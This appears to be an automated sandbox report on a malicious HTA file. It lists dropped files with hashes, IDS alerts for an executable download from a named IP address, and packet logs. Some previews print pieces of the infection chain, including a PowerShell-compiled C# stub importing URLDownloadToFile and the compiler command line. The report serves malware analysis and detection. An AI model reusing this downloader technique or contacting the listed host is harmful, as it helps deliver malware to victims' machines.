                                                                                          SHA1:35342AEA473C19AA7BBB7E0C02F8C46EB3E70B39
                                                                                          SHA-256:D7DDE1641BF7265D245DDE380C68FE4AB318CD2C8608254E5481345720BCB47D
                                                                                          SHA-512:CB886053F9EF14C09F2D3CE3B5B37E1C5D6DA825F6325ADDFCE6A97F5C4479BA0120C3E56CAA351626CBF6A3DC3D9DB434E4B6C4E8253C8D726563FCF6C566E7
                                                                                          Malicious:false
                                                                                          Preview:L....<.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\qrkmxxq1\CSCA5EBD89D883B423C8D6CB33CF6463C44.TMP................ ...c.,..t....j9..........3.......C:\Users\user\AppData\Local\Temp\RES9E10.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.r.k.m.x.x.q.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nbuz4qd.51u.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2oeufg0.ofm.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1okib0t.1gl.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3iiqkie.v2g.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\autB542.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\cosse.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):65878
                                                                                          Entropy (8bit):7.901093703451358
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:CPq33/z2Zj4vzb4ALS6HwWti/G2hWarFcILK0+scahbzrba5s0N:Diho3K4w/G2hWarFJcorba5sm
                                                                                          MD5:9517266B0CD76CE547FC0DAEE79EE2AE
                                                                                          SHA1:C5BB8A9DD4F3EAE8DF3FE0F11D63BED133829168
                                                                                          SHA-256:8F1B4958F85E55308DB95868A7540F3A79BCA6D0DEF5A04A2726F5FE15C929CD
                                                                                          SHA-512:65EB07F45602EEFEDD24BD5545AB92C732B8E0FF1199C424E7FDAC577F4C191F9DE8C6189445FC8EA2D7DB7526F2CBB350926A7CB7363DF9E6E966D661254D5F
                                                                                          Malicious:false
                                                                                          Preview:EA06..n..C.u..J.9.Q&...s7.RiS..^.U.......X..'3z@..h`... .X..?u......`g0..F/<.Q-...^M%.N,s...wV.Y*.[...Y.H$..,b%u.Mg.{..kN..,f5}...J.k.<....5...'4..F.C.VjUY...4.ZM&....>. .B+9.Y.....oL.....k]..Rs5.....#..*TY.....f...f*`...,.....3.p./.5Y.V@B? .o./H....0..!`........a..P..*Ur.W....>.E&.X..fRy...........b.XW.......9..r...iA.......4..!..H...x.M.@...Ww9.n. .."qD..st:.3.U.......q..R..../..Z.J...o.a;.e....R.T..&..Y.0....,!............ .A..!.@..J.XJ.....a..,$............B.4.Ro...*.j.Pk...6Sy.Uf{.,.aG.....*uA..d...b..N(.....9..)....Id......Byn.L(..x.QQ..j.........3..z-C.Da.M.qk..j..}z.U.D..I.....X..^.S..+.*.6b..p....Rui.Pj....YF..(.....G..)4...c..U...s..R..:..9H..(.j...h.\.....m..P...J.Z~..E.1R.....t.{Z.X)r\...K..l....s8.M#. .....O....._.Y...4...Xm...^.&..y.....4.Z......`.Po...X.F@..p..a.N(5....Z.U*....i6..-szE>.....7.5J...Q&...ZuJ..iS..Ny.......u?.L(u..N.I.G.w.H.QX......./D..c..0......i....B.....B{...C%..'sZ\.=8...r....(....*...7.Sl.j.s....7|...X.d.n....M...2O..[.!.

                                                                                          C:\Users\user\AppData\Local\Temp\forniciform

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\cosse.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):93696
                                                                                          Entropy (8bit):6.881980419687085
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:5+91hLu+SIDKEwqJ4IZ177Cb0rJ0RxzeJ8KYeajUEEza+83plc/H8rGkN+EVg:c9fu+HC+/80V0eJ8KaE2Xplc/crtbg
                                                                                          MD5:CD82C1C0D5425B9C8BADBF500C4A98F2
                                                                                          SHA1:174B0EB76618D70A8D303EFBD88907C20002CA5D
                                                                                          SHA-256:FE2E2F6D8C413DDA6E94D474E6D22D84FF423607C1825ABF0F75777893B27B25
                                                                                          SHA-512:82261A0632FD9E7CFB1E8DAADB8FFBA7623D11AB1BF05264727F966C1F5D0FCF7F3626716B5D4E6F9D5DA1FC7C1032FE2629A4EF0833D5F3455ABD62852AE0C1
                                                                                          Malicious:false
                                                                                          Preview:...Z[RU9<D40..97.IJ8AWAU.ZXRU98D40CT97HIJ8AWAUCZXRU98D40CT97.IJ8OH.[C.Q.t.9....<PDh98W&% 8c99<;VLdVUc&LYh $....u.5<7{45N.0CT97HI.}AW.T@Z.<..8D40CT97.IH9JV.UC>YRU18D40CT..IIJ.AWA.BZXR.98d40CV97LIJ8AWAUEZXRU98D4.BT95HIJ8AWCU#.XRE98T40CT)7HYJ8AWAUSZXRU98D40CTi.II.8AWA.BZ.WU98D40CT97HIJ8AWAUC.YRY98D40CT97HIJ8AWAUCZXRU98D40CT97HIJ8AWAUCZXRU98D40CT9.HIB8AWAUCZXRU90d40.T97HIJ8AWAUm.=*!98D.RBT9.HIJ\@WAWCZXRU98D40CT97hIJXo%2' ZXR.<8D4.BT91HIJ^@WAUCZXRU98D40.T9wf;/T.4AUOZXRU.9D42CT9[IIJ8AWAUCZXRU9xD4rCT97HIJ8AWAUCZXR.9D40CTq7HIH8DW=.CZ..U9;D40.T91..J8.WAUCZXRU98D40CT97HIJ8AWAUCZXRU98D40CT97HIJ8.*.Z..;&..D40CT96JJN>I_AUCZXRU9FD40.T97.IJ8vWAUfZXR898D.0CTG7HI48AW%UCZ*RU9YD40.T97'IJ8/WAU=ZXRK;.[40I~.7Jaj8A]A..)yRU3.E40G'.7HC.:AWE&`ZXX.:8D0CgT9=.MJ8E$dUCP.WU9<nn0@./1HIQWyWA_CY.GS98_..CV..HI@8kqAV.O^RU".f42.]97Lc.K\WASk.XR_M1D42.^97LcT:i.AUIpz,F98@.0ivG#HIN.A}c+VZXV~9.fJ&CT=.HchFVWAQhZrT.[86.<C$:X)IJ>i.AUIr.RU?8n.0=Z97LK%.AWKsi`Xz.98B4..T91Hc.8?dAUGv_,f98@.&=e97L.L@AWG&.ZXXp..D44k.97BI`.A..UC\Xz.98B

                                                                                          C:\Users\user\AppData\Local\Temp\qrkmxxq1\CSCA5EBD89D883B423C8D6CB33CF6463C44.TMP

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          File Type:MSVC .res
                                                                                          Category:dropped
                                                                                          Size (bytes):652
                                                                                          Entropy (8bit):3.119272920863618
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryspFGak7YnqqNpFXPN5Dlq5J:+RI+ycuZhNgFGakSDFXPNnqX
                                                                                          MD5:2082B2F363F42C07E7741FB8A9F06A39
                                                                                          SHA1:A03EA65E9F6A9CC0FD6AD25E539EEB5E5AAEE9CD
                                                                                          SHA-256:12DD21F6ADA3E7CB93E4ED7F45133B0E14D7E8C49F762CEA58DCF1D24D21DA78
                                                                                          SHA-512:E7CE5F5C7E55D79CF75F4F4D751D5750B0633EB0E98E15176BF72934F3185F20FC2288F5C4933B86840A958992AAD841FEB248299499417C9602BB73811A005B
                                                                                          Malicious:false
                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.r.k.m.x.x.q.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.r.k.m.x.x.q.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                          C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.0.cs

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (353)
                                                                                          Category:dropped
                                                                                          Size (bytes):468
                                                                                          Entropy (8bit):3.668523312823865
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:V/DsYLDS81zukxemM6JQXReKJ8SRHy4HEfCMVF/xTqQy:V/DTLDfubdXfHAXzTqQy
                                                                                          MD5:EE04842FD48AB54F6BAF3A0B869C2E25
                                                                                          SHA1:2F6684D1FCDB02B945E62D07526C36A2F9413359
                                                                                          SHA-256:534A908FF8CDC8AF9AAA9C758D338F666147B9DC62B54EA05272721584AD7084
                                                                                          SHA-512:BCABCB00003071A7A76B4940FB34A18B0EADD58009CB58D200F8A925EA93549DAA47C32F931D8A91218E2BE6B236EF40A0C7AEC8A86D1324B707186022956E82
                                                                                          Malicious:false
                                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace cEi.{. public class XxPGoYfw. {. [DllImport("uRLmon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZQmWToO,string UyH,string LJ,uint k,IntPtr CYbRE);.. }..}.

                                                                                          C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):367
                                                                                          Entropy (8bit):5.29094336232408
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fXhJ+zxs7+AEszIqLTwi23fX7:p37Lvkmb6KbwZZ0WZEmwZj
                                                                                          MD5:05E8D7AF086ACE5B7130BA06DEF604EF
                                                                                          SHA1:6FA2DE6463D8CB0097E0FD0DE013B70F9C60A613
                                                                                          SHA-256:809605A92FB974396FECE7F0477768328CC5D5686BF15D12921C0E1AA7CF3586
                                                                                          SHA-512:409A42EF095BA1A58D401AD3B325BD550DFD373E7CB76223BBD836BAADB3CB85DE584DD91A1718AD69DF0FE0F50CE4F5EEA6168CDC4D4C86BEB4BC52BE8481BD
                                                                                          Malicious:true
                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.0.cs"

                                                                                          C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.dll

                                                                                          Download File
                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3072
                                                                                          Entropy (8bit):2.8078422715542573
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:etGSGJOJK3lz8cLOkfBBNn+tkZfHdzVCryWWI+ycuZhNgFGakSDFXPNnqI:6VY3uwFjxJHdZCryd1ulIGa35FqI
                                                                                          MD5:3323729A71D4B6BACD0EFDD9354877AA
                                                                                          SHA1:2379DDC8885E07FE6AF17B175716ED68DC55D295
                                                                                          SHA-256:5D57F5D615D20DF6234F3B1BDA3F43C2D13371A2642D3EA0CF5F3050EA19D672
                                                                                          SHA-512:64AD8478188A88FA12DE5457FB00E2CC81D3D8DBBDD0E4BDD8B31109BC912AE4DD3E7A4160529ABD6D73EBDE706CEB47468036A384AF8BF7C41114A3C80BC01C
                                                                                          Malicious:true
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.g...........!.................#... ...@....... ....................................@.................................L#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................4.-.....j.....j........................... .............. ;.....P ......M.........S.....[....._.....b.....d...M.....M...!.M.....M.......!.....*.......;.......................................$..........<Module>.qr

                                                                                          C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.out

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):864
                                                                                          Entropy (8bit):5.341579027117136
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:K8qd3ka6KbwZvEmwZCKax5DqBVKVrdFAMBJTH:Hika6CwZvEmwZCK2DcVKdBJj
                                                                                          MD5:CB2F57C2E6E11650F687FF0B12C6558D
                                                                                          SHA1:88BD5FBF4E593BF448BD97318270D14453D00239
                                                                                          SHA-256:41CDB82A082FB4D2E0EB0F1620F2D50A295B608F17F7BEDFAB70F4394D5797C0
                                                                                          SHA-512:A194C8165FC05B5C6B059E68B14B2687E4D65DBCC97196828250E83F5016E9BAEE0CFEECF716114FB1908071A0942E29886B2D06A3D0E801345018F42066EF3E
                                                                                          Malicious:false
                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                          C:\Users\user\AppData\Roaming\cosse.exe

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):967680
                                                                                          Entropy (8bit):6.851122327803846
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:ou6J33O0c+JY5UZ+XC0kGso6FaiJu9OAuWY:Cu0c++OCvkGs9FaiVoY
                                                                                          MD5:709A4FFEC76D0C7715CB6A69A3610EDE
                                                                                          SHA1:172283B9521E8530D1D35D6EBD3E58B448949A4C
                                                                                          SHA-256:B46C0A570D881198169C6CC53BB5E525E294FBC86E527E214926A9FC44E96981
                                                                                          SHA-512:D5A904612D43160A1639DEAB33DBA60125FAEDF50917CFA1B37784C4AAD05DCAC07F1FB8C14587956F822B8DD263F34905B196A885064C617975200CA6595BE0
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 42%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L......g.........."..................}............@..........................0............@...@.......@.....................L...|....p...;.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....;...p...<..................@..@.reloc...q.......r...R..............@..B........................................................................................................................................................................................................................................................................................

                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):55
                                                                                          Entropy (8bit):4.306461250274409
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                          Malicious:false
                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:HTML document, ASCII text, with very long lines (14709), with CRLF line terminators
                                                                                          Entropy (8bit):2.4522711167805595
                                                                                          TrID:
                                                                                          • HyperText Markup Language (15015/1) 100.00%
                                                                                          File name:wecreatebestthingsentirelifeforgivenyou.hta
                                                                                          File size:14'878 bytes
                                                                                          MD5:7c7b7736fd7286e02a2d2b8fa534c43b
                                                                                          SHA1:ba864f100c8ff38d4ca4b344050760863a33a24d
                                                                                          SHA256:4ad94e45fdf797bcd666aa0de12c32a3f59d46103b7053d8fb94428a59478481
                                                                                          SHA512:8afb1b426b8ce0dc9510596b876be29e5348d47248ccde014655f942fe9513c5719ea1cc88e5a5913718acc883c47882a845c7d5c35b55d2468e8264c4aa8e4f
                                                                                          SSDEEP:48:3ymOYNcEmOGT6Nco4bgzntij99DdPGAOrphMRrmO3rmO2QwSKNcYQmO/G:CmOucEmObcB0zofxGr9wmO7mOIcRmOO
                                                                                          TLSH:4462642A1C19AC4CC322CD00B5DCA4E71AADE37E91555491F19E9C1B23B0C6EA8EC7F7
                                                                                          File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<scRIpt TYpE="TEXt/VBscrIpt">..diM..............................................................................................................................

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-03-13T01:18:59.938280+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11107.174.231.21180192.168.2.949683TCP
                                                                                          2025-03-13T01:19:00.029619+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21107.174.231.21180192.168.2.949683TCP
                                                                                          2025-03-13T01:19:07.582871+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949684132.226.247.7380TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Mar 13, 2025 01:18:59.394718885 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.399604082 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.399800062 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.400007963 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.404864073 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.937964916 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.937987089 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938055038 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.938059092 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938093901 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.938143969 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938155890 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938179970 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938194036 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938273907 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.938280106 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938296080 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938311100 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.938352108 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.938352108 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.943274975 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.943289995 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.943344116 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.943355083 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.943367004 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:18:59.943367004 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.943418026 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:18:59.943459034 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.026474953 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026534081 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026546955 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026582956 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026592016 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.026592016 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.026658058 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026673079 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026735067 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.026735067 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.026735067 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.026762962 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026776075 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.026926041 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.027434111 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027462006 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027477980 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027518034 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.027539968 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.027771950 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027825117 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027836084 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027879953 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.027909994 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.027965069 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.027977943 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.028039932 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.028039932 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.028625011 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.028645992 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.028656960 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.028686047 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.028760910 CET4968380192.168.2.9107.174.231.211
                                                                                          Mar 13, 2025 01:19:00.028804064 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.028817892 CET8049683107.174.231.211192.168.2.9
                                                                                          Mar 13, 2025 01:19:00.028862953 CET4968380192.168.2.9107.174.231.211
